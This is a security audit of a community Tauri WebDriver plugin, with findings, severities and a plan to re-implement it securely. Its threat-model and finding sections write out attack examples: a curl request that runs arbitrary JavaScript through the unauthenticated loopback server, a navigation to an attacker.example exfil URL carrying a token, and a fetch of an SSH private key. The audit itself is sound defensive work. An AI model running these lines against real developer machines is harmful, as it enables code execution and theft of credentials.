Locara

tauri-webdriver-automation (danielraffel) — Security Audit

What it is: A community Tauri 2 plugin that exposes a WebDriver-shaped HTTP server inside a debug-built Tauri app on macOS, plus a CLI (tauri-wd) that translates W3C WebDriver requests into the plugin’s protocol, plus an MCP server (mcp-tauri-automation) that lets agents drive the whole stack through a model.

Status: Live as of 2026-02. Small project (1 author, 16 stars, ~2 kLOC Rust, ~1.7 kLOC TS). Last commit on main: 2026-02-17.

Most relevant to Locara: It is the only freely available tool we found that solves agent-driven Tauri testing on Apple Silicon, but it ships several patterns that conflict with Locara’s security stance.

Audit verdict: re-implement, don’t vendor.

This note records the audit findings against the methodology. Audited commit: main HEAD as of 2026-05-07.

Plugin facts

Field                Value
Repo                 https://github.com/danielraffel/tauri-webdriver
License              MIT OR Apache-2.0 (vendor-OK)
LOC                  plugin: lib.rs 92 + server.rs 1804 + init.js ~135 ≈ 2030 LOC; CLI: main.rs 1768
Crate version        0.1.3
Last commit (main)   2026-02-17 (≈2.5 months stale)
Open issues          4 (incl. #4, PoisonError self-termination on macOS)
Stars / forks        16 / 2
Plugin direct deps   axum 0.8, tokio 1, serde 1, serde_json 1, uuid 1, tracing 0.1, tauri 2 (wry, dynamic-acl)
Bus factor           1 (@danielraffel, AI-assisted per the README)
Companion MCP        danielraffel/mcp-tauri-automation: TS, MIT, fork of Radek44/mcp-tauri-automation, last push 2026-02-14

TL;DR

Re-implement, don’t vendor. Three load-bearing problems:

  1. The HTTP server is unauthenticated on a loopback TCP port — any local process gets RCE in the webview.
  2. The plugin bypasses the host app’s capability ACL by calling app.add_capability(...) at runtime with window("*") + remote http://*/https://* globs.
  3. The “debug-only” promise is a README convention, not a code-level kill-switch — there’s no #[cfg(not(debug_assertions))] compile_error!, so a release build accidentally including the dependency ships an open WebDriver server.

The agent-useful subset (click, type, eval, screenshot, invoke) is well under 500 LOC of axum + WebviewWindow::eval. Vendoring the upstream would inherit all three problems plus the v0.1.3 PoisonError reliability bug. We rebuild on Locara’s terms — Unix-socket transport, bearer-token auth, compile-time release-build guard, capability integration that respects the manifest, structured audit log.

Threat model — what an attacker can do

Against tauri-webdriver-automation running in a typical Tauri 2 dev environment:

Same-machine, different-process → Critical. Any local process running as the user (a malicious npm postinstall, a compromised VS Code extension, a Mac-malware sample) can curl -X POST http://127.0.0.1:<port>/script/execute -d '{"script":"...","args":[]}' and run arbitrary JS in your dev app’s webview. That JS can:

  • Read DOM and exfil to the network (fetch).
  • Call any Tauri command via window.__TAURI_INTERNALS__.invoke — the plugin’s runtime ACL bypass means window("*") is allowed, so even non-debug commands are reachable.
  • Read file:// URLs if the host app’s app.security.assetProtocol allows it (default Tauri is restrictive but plugins commonly loosen this).

The port is broadcast on stdout (server.rs:1798: println!("[webdriver] listening on port {}", port)); anything that captures the dev binary’s stdout (CI log uploads, screen-share, parent-process tee) leaks the port. Even without that leak, the loopback port space is at most ~64 k ports, which is scannable in seconds.

Same-LAN, browser tab → Probably blocked, but only by the browser. A page on a coffee-shop network can’t open a socket to 127.0.0.1 itself, but it can ask the victim’s browser to send requests there. The plugin sets no CORS headers and doesn’t validate Host or Origin. The plugin uses application/json POSTs, which trigger a CORS preflight, and the missing Access-Control-Allow-Origin causes that preflight to fail in a normal browser. So a naive cross-origin fetch fails, but it fails outside the plugin, in the browser’s CORS enforcement, not inside the plugin’s code. DNS rebinding against localhost:<port> is a known bypass: once the attacker’s hostname resolves to 127.0.0.1 the request is same-origin, no preflight happens, and only a Host check (which the plugin lacks) would stop it. Native helpers, browser extensions with <all_urls> permission, and non-browser HTTP clients have no such mitigation either.
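The missing Host and Origin validation could be sketched as follows, assuming a TCP listener were kept at all. The function names and the policy of rejecting any request that carries an Origin header are illustrative assumptions, not upstream code.

```rust
/// Returns true only when the Host header names the loopback interface on the
/// expected port. A DNS-rebinding page sends its own hostname in Host, so this
/// check rejects it even though the TCP connection arrives on 127.0.0.1.
pub fn host_is_loopback(host_header: &str, expected_port: u16) -> bool {
    // Split "name:port"; IPv6 literals look like "[::1]:port".
    let Some((name, port)) = host_header.trim().rsplit_once(':') else {
        return false; // the server never listens on a default port
    };
    let Ok(port) = port.parse::<u16>() else {
        return false;
    };
    let name_ok = matches!(
        name.to_ascii_lowercase().as_str(),
        "127.0.0.1" | "localhost" | "[::1]"
    );
    name_ok && port == expected_port
}

/// Hypothetical policy: accept a request only with a loopback Host and no
/// Origin header, since native test clients do not send Origin.
pub fn request_allowed(host: Option<&str>, origin: Option<&str>, port: u16) -> bool {
    match (host, origin) {
        (Some(h), None) => host_is_loopback(h, port),
        _ => false,
    }
}
```

This moves the browser-tab defense into the server’s own code instead of relying on CORS behavior in the client.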

Same-LAN, native client → No direct exposure. TcpListener::bind("127.0.0.1:0") doesn’t accept off-host connections.

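Production-build accident → Critical. If a downstream user adds the crate to [dependencies] and forgets the #[cfg(debug_assertions)] wrap in main.rs, the release build ships a fully open WebDriver server. Moving the crate to [target.'cfg(debug_assertions)'.dependencies] is not a reliable gate either: Cargo’s documentation states that debug_assertions does not work as expected in target cfg expressions. There is no compile-time check, env-var gate, or runtime check inside the plugin to prevent this.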

Findings

F1 — Loopback HTTP server is unauthenticated

server.rs:1795: tokio::net::TcpListener::bind("127.0.0.1:0"). No bearer token, no shared secret, no Unix-socket peer credentials, no Authorization header check, no rate limit. Routes are bare POST /script/execute, POST /navigate/url, POST /cookie/add, etc.

Attacker class: same-machine. Severity: Critical. Mitigation if vendoring: require an Authorization: Bearer <token> header with a 32-byte random token generated at boot, written to a 0600-mode file in $XDG_RUNTIME_DIR. Better: drop TCP entirely, switch to a Unix domain socket with peer-credential check (SO_PEERCRED on Linux, LOCAL_PEERCRED on macOS).
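A minimal, std-only sketch of the token half of that mitigation. It assumes a Unix host with /dev/urandom; the function names are hypothetical, and a real implementation would more likely draw randomness from a vetted crate.

```rust
use std::fs::{File, OpenOptions};
use std::io::{self, Read, Write};
use std::os::unix::fs::OpenOptionsExt;
use std::path::Path;

/// Reads 32 bytes from the OS random device and hex-encodes them (64 chars).
pub fn generate_token() -> io::Result<String> {
    let mut raw = [0u8; 32];
    File::open("/dev/urandom")?.read_exact(&mut raw)?;
    Ok(raw.iter().map(|b| format!("{b:02x}")).collect())
}

/// Writes the token to a new file that only the owner can read or write.
/// `create_new` fails if the path already exists, so a pre-planted file is
/// never reused.
pub fn write_token_file(path: &Path, token: &str) -> io::Result<()> {
    let mut f = OpenOptions::new()
        .write(true)
        .create_new(true)
        .mode(0o600)
        .open(path)?;
    f.write_all(token.as_bytes())
}

/// Compares without an early exit so timing does not reveal a matching prefix.
pub fn constant_time_eq(a: &[u8], b: &[u8]) -> bool {
    if a.len() != b.len() {
        return false;
    }
    a.iter().zip(b).fold(0u8, |acc, (x, y)| acc | (x ^ y)) == 0
}

/// Accepts only `Bearer <token>` carrying the exact expected token.
pub fn check_bearer(header: Option<&str>, expected: &str) -> bool {
    header
        .and_then(|h| h.strip_prefix("Bearer "))
        .map(|t| constant_time_eq(t.as_bytes(), expected.as_bytes()))
        .unwrap_or(false)
}
```

The check is deliberately a pure function over the header value so it can sit in whatever middleware layer the server ends up using.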

F2 — #[cfg(debug_assertions)] is a README convention, not enforced in code

lib.rs::init() has zero cfg gates. The plugin will happily start the server in a release binary. The protection — wrapping app.plugin(tauri_plugin_webdriver_automation::init())? in #[cfg(debug_assertions)] — has to happen at the call site, in the consumer’s main.rs, where it is one missed wrap away from shipping.

Attacker class: production-build accident. Severity: Critical. Mitigation if re-implementing:

// crates/locara-automation/src/lib.rs (top of file)
// Cargo does not honor debug_assertions in [target.'cfg(...)'.dependencies],
// so the message points consumers at an optional, dev-only feature instead.
#[cfg(not(any(debug_assertions, feature = "force-enable-automation")))]
compile_error!("locara-automation must not be linked into release builds. \
                Make it an optional dependency behind a dev-only Cargo \
                feature, or enable the explicit `force-enable-automation` \
                feature flag.");

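In addition, init() performs a runtime check for LOCARA_AUTOMATION=1. If the variable is unset, init() returns success but never opens the surface. Defense in depth: a release build fails to compile, and any build that does link the crate still refuses to start the server without the variable.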

F3 — Plugin self-grants a permissive capability that overrides tauri.conf.json

lib.rs:60-66:

app.add_capability(
    tauri::ipc::CapabilityBuilder::new("webdriver-automation")
        .local(true)
        .window("*")
        .remote("http://*".into())
        .remote("https://*".into())
        .permission("webdriver-automation:default"),
)?;

window("*") allows any window. The two remote("http://*") / remote("https://*") globs allow any http/https origin loaded into a webview to call plugin:webdriver-automation|resolve. The resolve callback is invoked from the plugin’s own injected init.js, not from remote pages, so the remote globs are gratuitous — they only expand the IPC attack surface.

Attacker class: any page loaded into the webview (in scope for apps that allow remote content). Severity: High. Mitigation if re-implementing: ship a permissions/automation.toml and require the host app to opt in via its own tauri.conf.json capability allowlist. Tighten window scope to a specific automation window label. Drop the .remote() globs entirely.

F4 — script_execute is a thin shell over webview eval

server.rs:755-765 — request body’s script is wrapped into (function(){ ... }).apply(null, __args) and passed straight to WebviewWindow::eval. No allowlist, no sandboxing, no audit log of what JS ran.

This is by design — it’s the agent surface — but combined with F1, anyone speaking to the loopback port can do anything the page can.

Attacker class: same-machine (gated by F1 if F1 is fixed). Severity: High (as a primitive). Acceptable if and only if F1 is mitigated and an audit log is added. Mitigation if re-implementing: keep the eval primitive (we need it), but wrap it in:

  • bearer-token / unix-socket auth (closes F1),
  • structured append-only audit log (timestamp, route, caller PID via SO_PEERCRED on Linux or LOCAL_PEERPID on macOS, body hash, response shape),
  • compile-time release-build kill-switch (closes F2).

F5 — navigate_url accepts arbitrary URLs

server.rs:834+ — driver can drive the webview to any URL. Combined with F1, an attacker can pivot the webview to https://attacker.example/exfil?token=... carrying the user’s session.

Attacker class: same-machine. Severity: Medium (high if combined with F1 unfixed). Mitigation: allowlist the navigation targets to tauri://, data:, and explicitly-permitted origins.
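One way the navigation allowlist could look, as a std-only sketch. The function names are hypothetical and the origin parsing is intentionally strict rather than a full URL parser; a real implementation would more likely use a URL-parsing crate.

```rust
/// Returns the `scheme://authority` origin of an http(s) URL, or None when the
/// URL is malformed or carries userinfo (`user@host`), a common way to
/// disguise the real host.
pub fn http_origin(url: &str) -> Option<String> {
    let (scheme, rest) = url.split_once("://")?;
    let scheme = scheme.to_ascii_lowercase();
    if scheme != "http" && scheme != "https" {
        return None;
    }
    // The authority ends at the first '/', '?' or '#'.
    let end = rest
        .find(|c: char| matches!(c, '/' | '?' | '#'))
        .unwrap_or(rest.len());
    let authority = &rest[..end];
    if authority.is_empty() || authority.contains('@') || authority.contains('\\') {
        return None;
    }
    Some(format!("{scheme}://{}", authority.to_ascii_lowercase()))
}

/// Allows tauri:// and data: URLs plus an explicit list of exact origins.
/// Origins are compared whole, so "https://app.example" does not match
/// "https://app.example.attacker.example".
pub fn navigation_allowed(url: &str, allowed_origins: &[&str]) -> bool {
    let url = url.trim();
    let lower = url.to_ascii_lowercase();
    if lower.starts_with("tauri://") || lower.starts_with("data:") {
        return true;
    }
    match http_origin(url) {
        Some(origin) => allowed_origins
            .iter()
            .any(|a| a.eq_ignore_ascii_case(&origin)),
        None => false,
    }
}
```

Comparing whole origins rather than string prefixes is the point of the sketch: prefix matching is the usual way such allowlists get bypassed.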

F6 — fetch('file://...') gated only by WKWebView config

The plugin doesn’t tighten app.security.assetProtocol. If the host app loosens it for asset loading, the WebDriver caller can read arbitrary files via fetch('file:///Users/you/.ssh/id_rsa').

Attacker class: same-machine (same as F1). Severity: High (in apps that allow file:); inert otherwise. Mitigation if re-implementing: require strict assetProtocol and dangerousDisableAssetCspModification = false whenever automation is enabled; refuse to start otherwise.

F7 — expect/unwrap-heavy mutex locking

server.rs and lib.rs use .lock().expect("...") extensively (pending_scripts, frame_stack, current_window_label). Issue #4 confirms a PoisonError self-terminates tauri-wd on macOS in v0.1.3 after a few sequential tests.

Attacker class: none directly, but reliability bugs of this shape are the difference between “tests pass once then deadlock” and “tests are dependable.” Severity: Medium (reliability). Mitigation if re-implementing: RwLock over Mutex where possible (std’s RwLock poisons too, so the same handling applies), try_lock()-with-recovery on critical paths, structured panic-to-error conversion at task boundaries. Replace every .expect("lock poisoned") with let Ok(g) = m.lock() else { return Err(ServerError::Poisoned); }; so a poisoned lock becomes an error response instead of a panic.
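A small sketch of the two poisoning strategies named above, using only std. ServerError here is a stand-in with a single variant, and the helper names are hypothetical.

```rust
use std::sync::{Mutex, MutexGuard};

#[derive(Debug, PartialEq)]
pub enum ServerError {
    Poisoned,
}

/// Locks the mutex and reports poisoning as an error instead of panicking.
pub fn lock_or_error<T>(m: &Mutex<T>) -> Result<MutexGuard<'_, T>, ServerError> {
    let Ok(guard) = m.lock() else {
        return Err(ServerError::Poisoned);
    };
    Ok(guard)
}

/// Alternative: take the guard out of the PoisonError and keep going. Only
/// appropriate when the protected data stays valid after a panic mid-update.
pub fn lock_recovering<T>(m: &Mutex<T>) -> MutexGuard<'_, T> {
    m.lock().unwrap_or_else(|poisoned| poisoned.into_inner())
}

/// Example call site: reading the current window label never panics.
pub fn current_window_label(state: &Mutex<String>) -> Result<String, ServerError> {
    Ok(lock_or_error(state)?.clone())
}
```

Which strategy fits depends on the state: a simple label can usually be recovered, while a half-updated map may be safer to surface as an error.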

F8 — Stdout port disclosure

server.rs:1798 calls println!("[webdriver] listening on port {}", port). Anything reading the binary’s stdout (CI log uploads, tee’d dev terminals, screen-share, parent-process capture) leaks the port. With F1 unfixed, this is a one-shot RCE for any process that captured a CI log.

Attacker class: same-machine + log-leak. Severity: Low alone, High when combined with F1. Mitigation if re-implementing: Unix socket eliminates the port. Token (if we still expose one) goes to a 0600-mode file readable only by the same UID, never to stdout.

F9 — tauri-wd CLI launches arbitrary binaries

main.rs:319: tokio::process::Command::new(&binary), where binary comes from the W3C session capability tauri:options.binary. Anyone speaking to the CLI on :4444 can execute any binary on disk.

Attacker class: same-machine (against the test runner, not the plugin). Severity: High if we ship the tauri-wd CLI or the MCP companion that drives it; inert if we ship neither. Decision: ship neither. Locara’s automation is wired directly into the locara CLI; we don’t need a separate WebDriver-shaped CLI.

F10 — Dependency surface is clean (positive finding)

axum 0.8, tokio 1, serde 1, serde_json 1, uuid 1, tracing 0.1, tauri 2. All actively maintained, no yanked versions, no open cargo audit advisories of note. No unsafe in plugin source. No supply-chain finding. The risk is in the plugin’s own design, not its deps.

What the plugin gets right (worth porting)

  • __WEBDRIVER__ JS bridge pattern: js_init_script injects a small client-side helper that exposes window.__WEBDRIVER__.resolve(id, value) → a tokio::sync::oneshot on the Rust side. Clean, low-overhead, parameter-safe (the script body is the only stringy bit). Rename to __LOCARA__ for ours.
  • pending_scripts: Mutex<HashMap<id, oneshot::Sender>> lifecycle — request comes in, generates UUID, writes to map, eval’s the script with the UUID, JS resolves with the UUID, Rust pulls the sender from the map and replies. Replace expect() with poisoned-recovery; otherwise port intact.
  • on_webview_ready broadcast — start the automation server only after at least one webview exists, so eval always has somewhere to land. Useful pattern.
  • Single-binary debug-only philosophy — the intent is right; we just enforce it in code instead of README.
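The pending_scripts lifecycle from the list above can be sketched with std types only. This is an illustration under stated substitutions: std::sync::mpsc stands in for tokio::sync::oneshot, and a counter stands in for the UUID request id.

```rust
use std::collections::HashMap;
use std::sync::atomic::{AtomicU64, Ordering};
use std::sync::mpsc::{channel, Receiver, Sender};
use std::sync::Mutex;

#[derive(Default)]
pub struct PendingScripts {
    next_id: AtomicU64,
    waiting: Mutex<HashMap<u64, Sender<String>>>,
}

impl PendingScripts {
    /// Registers a request and returns its id plus the receiver the HTTP
    /// handler waits on. The id is what gets embedded in the eval'd script.
    pub fn register(&self) -> (u64, Receiver<String>) {
        let (tx, rx) = channel();
        let id = self.next_id.fetch_add(1, Ordering::Relaxed) + 1;
        self.waiting
            .lock()
            .unwrap_or_else(|p| p.into_inner()) // recover instead of expect()
            .insert(id, tx);
        (id, rx)
    }

    /// Called when the page reports a result. Returns false for unknown or
    /// already-resolved ids, so an id cannot be resolved twice.
    pub fn resolve(&self, id: u64, value: String) -> bool {
        let sender = self
            .waiting
            .lock()
            .unwrap_or_else(|p| p.into_inner())
            .remove(&id);
        match sender {
            Some(tx) => tx.send(value).is_ok(),
            None => false,
        }
    }
}
```

Removing the sender before sending keeps the lock held only for the map operation, not for the channel send.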

Re-implementation sketch — crates/locara-automation

Target: <500 LOC Rust + ~80 LOC JS. Zero new top-level transitive crates beyond what Locara already pulls in (axum, tokio, serde, serde_json, tauri, uuid, tracing).

crates/locara-automation/
  Cargo.toml                        # debug-only feature, version pinned to workspace
  permissions/
    automation.toml                 # opt-in capability, host-app declares
    default.toml                    # the single permission `automation:resolve`
  src/
    lib.rs                          # plugin entry, compile-time guard, capability registration
    server.rs                       # axum router on a Unix socket, ~250 LOC
    auth.rs                         # bearer-token middleware, token file lifecycle
    audit.rs                        # append-only JSONL log, ~80 LOC
    init.js                         # __LOCARA__ bridge, mirror of upstream init.js

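Transport: tokio::net::UnixListener::bind("$XDG_RUNTIME_DIR/locara-automation-<pid>.sock") with the socket file restricted to 0o600. macOS does not set XDG_RUNTIME_DIR by default, so the path needs a fallback such as the per-user $TMPDIR. Closes F1, F8 in one move.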
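A sketch of the bind step using std’s blocking UnixListener as a stand-in for the tokio one. The private subdirectory and the <pid>.sock file name are assumptions made here to keep the path short and to avoid a window between bind() and chmod(); they are not part of the plan above.

```rust
use std::fs;
use std::io;
use std::os::unix::fs::{DirBuilderExt, PermissionsExt};
use std::os::unix::net::UnixListener;
use std::path::{Path, PathBuf};

/// Binds a Unix socket inside a directory only the owner can enter, then
/// restricts the socket file itself to 0o600.
pub fn bind_private_socket(
    runtime_dir: &Path,
    pid: u32,
) -> io::Result<(UnixListener, PathBuf)> {
    let dir = runtime_dir.join("locara-automation");
    // A 0o700 parent means no other user can reach the socket even before
    // its own mode is tightened.
    match fs::DirBuilder::new().mode(0o700).create(&dir) {
        Ok(()) => {}
        Err(e) if e.kind() == io::ErrorKind::AlreadyExists => {}
        Err(e) => return Err(e),
    }
    // Re-assert the mode in case the directory pre-existed; this fails if
    // the directory belongs to another user.
    fs::set_permissions(&dir, fs::Permissions::from_mode(0o700))?;

    let path = dir.join(format!("{pid}.sock"));
    let listener = UnixListener::bind(&path)?; // errors if the path exists
    fs::set_permissions(&path, fs::Permissions::from_mode(0o600))?;
    Ok((listener, path))
}
```

Because bind fails when the path already exists, a stale or pre-planted socket is surfaced as an error rather than silently reused.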

Auth: ephemeral 32-byte bearer token, written to $XDG_RUNTIME_DIR/locara-automation-<pid>.token mode 0o600. The Locara CLI reads the path from $XDG_RUNTIME_DIR (or from a structured handshake message on the socket itself), never from stdout.

Compile-time guard (F2):

#[cfg(not(any(debug_assertions, feature = "force-enable-automation")))]
compile_error!("locara-automation must not be linked into release builds");

Runtime guard: init() checks LOCARA_AUTOMATION=1; if unset, returns Ok without starting the server. The Locara CLI sets this when it spawns the dev shell.
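The runtime guard is small enough to sketch in full. InitOutcome and init_with are hypothetical names; the real init() would return the Tauri plugin rather than an enum.

```rust
use std::env;

#[derive(Debug, PartialEq)]
pub enum InitOutcome {
    Started,
    Disabled,
}

/// True only when the variable is set to exactly "1".
pub fn automation_enabled(value: Option<&str>) -> bool {
    value == Some("1")
}

/// Reads LOCARA_AUTOMATION from the process environment.
pub fn automation_enabled_from_env() -> bool {
    automation_enabled(env::var("LOCARA_AUTOMATION").ok().as_deref())
}

/// Succeeds either way, but runs `start_server` only when the gate is open.
pub fn init_with<F: FnOnce()>(value: Option<&str>, start_server: F) -> InitOutcome {
    if !automation_enabled(value) {
        return InitOutcome::Disabled;
    }
    start_server();
    InitOutcome::Started
}
```

Treating anything other than "1" as disabled avoids ambiguity over values such as "true" or an empty string.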

Capability integration (F3): never call add_capability at runtime. Ship permissions/automation.toml; require the consumer to add automation:default to their own capability allowlist. Locara apps already have capability declarations in their manifests — this is the same path.

IPC shape (six routes, agent-useful subset):

POST /eval         { window, script }              → { value }
POST /click        { window, selector, index }     → { ok }
POST /type         { window, selector, text }      → { ok }
POST /screenshot   { window }                      → { png_b64 }
POST /invoke       { window, command, payload }    → { value }
POST /navigate     { window, url }                 → { ok }

That’s it. No frames, no shadow DOM, no cookies, no alerts. Add when an actual recipe needs it.
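The closed route set can be expressed as an enum so that anything outside the six routes is rejected before a handler runs. This is a sketch; the Route type and its parse function are illustrative names, and the real router would be built with axum.

```rust
#[derive(Debug, PartialEq, Eq, Clone, Copy)]
pub enum Route {
    Eval,
    Click,
    Type,
    Screenshot,
    Invoke,
    Navigate,
}

impl Route {
    /// Maps a method and path to one of the six routes. Everything else,
    /// including the upstream WebDriver paths, yields None.
    pub fn parse(method: &str, path: &str) -> Option<Route> {
        if method != "POST" {
            return None;
        }
        match path {
            "/eval" => Some(Route::Eval),
            "/click" => Some(Route::Click),
            "/type" => Some(Route::Type),
            "/screenshot" => Some(Route::Screenshot),
            "/invoke" => Some(Route::Invoke),
            "/navigate" => Some(Route::Navigate),
            _ => None,
        }
    }

    /// Path as it would appear in the audit log's `route` field.
    pub fn as_path(self) -> &'static str {
        match self {
            Route::Eval => "/eval",
            Route::Click => "/click",
            Route::Type => "/type",
            Route::Screenshot => "/screenshot",
            Route::Invoke => "/invoke",
            Route::Navigate => "/navigate",
        }
    }
}
```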

Lifecycle: start the server in setup() after on_webview_ready. Store the JoinHandle in plugin state. Abort on RunEvent::Exit. Refuse to start if a sibling locara-automation-*.sock already exists for the same UID + bundle ID (prevents accidental double-launch attacks).

Audit log (mandatory): every request writes a line to ~/Library/Logs/Locara/automation-<date>.jsonl:

{"ts":"2026-05-07T19:14:22Z","route":"/eval","caller_pid":12345,"caller_uid":501,"body_sha256":"…","response_shape":"value","ms":14}

Append-only, log-rotated daily.
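A std-only sketch of writing one such line. The AuditEntry struct and helper names are hypothetical; the timestamp and SHA-256 digest are assumed to be computed by the caller, and a real implementation would more likely serialize with serde_json.

```rust
use std::fs::OpenOptions;
use std::io::{self, Write};
use std::path::Path;

pub struct AuditEntry<'a> {
    pub ts: &'a str,             // RFC 3339 timestamp, supplied by the caller
    pub route: &'a str,
    pub caller_pid: u32,
    pub caller_uid: u32,
    pub body_sha256: &'a str,    // hex digest, computed elsewhere
    pub response_shape: &'a str,
    pub ms: u64,
}

/// Escapes the characters that would break a JSON string literal.
pub fn json_escape(s: &str) -> String {
    let mut out = String::with_capacity(s.len());
    for c in s.chars() {
        match c {
            '"' => out.push_str("\\\""),
            '\\' => out.push_str("\\\\"),
            c if (c as u32) < 0x20 => out.push_str(&format!("\\u{:04x}", c as u32)),
            c => out.push(c),
        }
    }
    out
}

impl AuditEntry<'_> {
    /// Renders one newline-terminated JSONL record.
    pub fn to_json_line(&self) -> String {
        format!(
            "{{\"ts\":\"{}\",\"route\":\"{}\",\"caller_pid\":{},\"caller_uid\":{},\"body_sha256\":\"{}\",\"response_shape\":\"{}\",\"ms\":{}}}\n",
            json_escape(self.ts),
            json_escape(self.route),
            self.caller_pid,
            self.caller_uid,
            json_escape(self.body_sha256),
            json_escape(self.response_shape),
            self.ms
        )
    }
}

/// Opens the log in append mode so existing records are never rewritten.
pub fn append_audit(path: &Path, entry: &AuditEntry<'_>) -> io::Result<()> {
    let mut f = OpenOptions::new().create(true).append(true).open(path)?;
    f.write_all(entry.to_json_line().as_bytes())
}
```

Logging a hash of the body rather than the body itself keeps secrets typed into the page out of the log while still letting two requests be compared.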

Mutex discipline (F7): RwLock for read-mostly state (the pending_scripts map). try_lock + structured error on contention. Every panic at a task boundary is converted to a 500 Internal Server Error in the response and never propagates.
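The panic-to-500 conversion can be illustrated with std::panic::catch_unwind. This is a sketch under assumptions: Response and run_guarded are hypothetical, the approach requires the default panic = "unwind" setting, and in an async server the equivalent signal would come from the spawned task’s join result.

```rust
use std::panic::{catch_unwind, AssertUnwindSafe};

#[derive(Debug, PartialEq)]
pub struct Response {
    pub status: u16,
    pub body: String,
}

/// Runs a handler and turns a panic into a 500 response instead of letting
/// it unwind through the server.
pub fn run_guarded<F>(handler: F) -> Response
where
    F: FnOnce() -> Response,
{
    // AssertUnwindSafe: the handler's captured state is assumed to be either
    // discarded after a panic or protected by the poisoning-aware locks.
    match catch_unwind(AssertUnwindSafe(handler)) {
        Ok(resp) => resp,
        Err(_) => Response {
            status: 500,
            body: "internal server error".to_string(),
        },
    }
}
```

The response body is kept generic on purpose; the panic detail belongs in the audit log or tracing output, not in what the caller sees.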

Closes F4-F6, F8-F9 by construction: F4 (eval surface) is wrapped by F1+F2 mitigations and the audit log. F5 (navigate) is allowlisted. F6 (file://) is precondition-checked at startup. F8 (stdout) is gone — Unix socket. F9 (CLI binary launching) is out of scope — we don’t ship the WebDriver CLI.

Effort: 1-2 days of focused work for the plugin + a Bun runner that talks to the socket. Recipes from tools/probe-ui port nearly unchanged because they already use the Probe handle abstraction; a thin adapter from Probe → automation-socket replaces the Playwright bits.

Specific learnings for Locara

  1. The fact that an unauthenticated, ACL-bypassing, README-gated WebDriver plugin is the best available option for agent-driven Tauri testing on macOS is itself a useful signal. The space is wide open. Locara should treat agent-driven E2E as a product feature, not a third-party dependency. Owning the surface is consistent with our security positioning and removes a long-term supply-chain risk.

  2. Patterns to copy from upstream: js_init_script + oneshot::channel resolve mechanism, on_webview_ready broadcast, request-id-routed scripts. These are well-shaped.

  3. Patterns to discard: TCP-bind, runtime add_capability, README-only cfg gating, port disclosure on stdout, expect()-heavy mutex locking, MCP companion binary launcher.

  4. Defense in depth means three layers: (a) compile-time compile_error! blocks release builds, (b) runtime env-var gate refuses to open the surface, (c) Unix socket + bearer token blocks anything that gets past (a) and (b).

  5. Audit logs aren’t optional for RCE-shape primitives. A surface that can eval JS in a webview must have a structured, append-only, on-disk record of every call. The reason isn’t blame — it’s that when something goes wrong, you need the data.

  6. Re-implementation cost is small (~500 LOC). Less than the audit cost of vendoring upstream and maintaining a security-fixed fork over time. The decision is structural, not heroic.

  7. tauri-driver (official) and CrabNebula’s @crabnebula/tauri-driver are also options — official is [Todo] on macOS so a non-starter today; CrabNebula is paywalled for macOS. Build our own.

  8. Update notes/tauri.md cross-reference when this lands: Locara’s testing primitive is a Tauri plugin, not a third-party tool. Same trust boundary.

References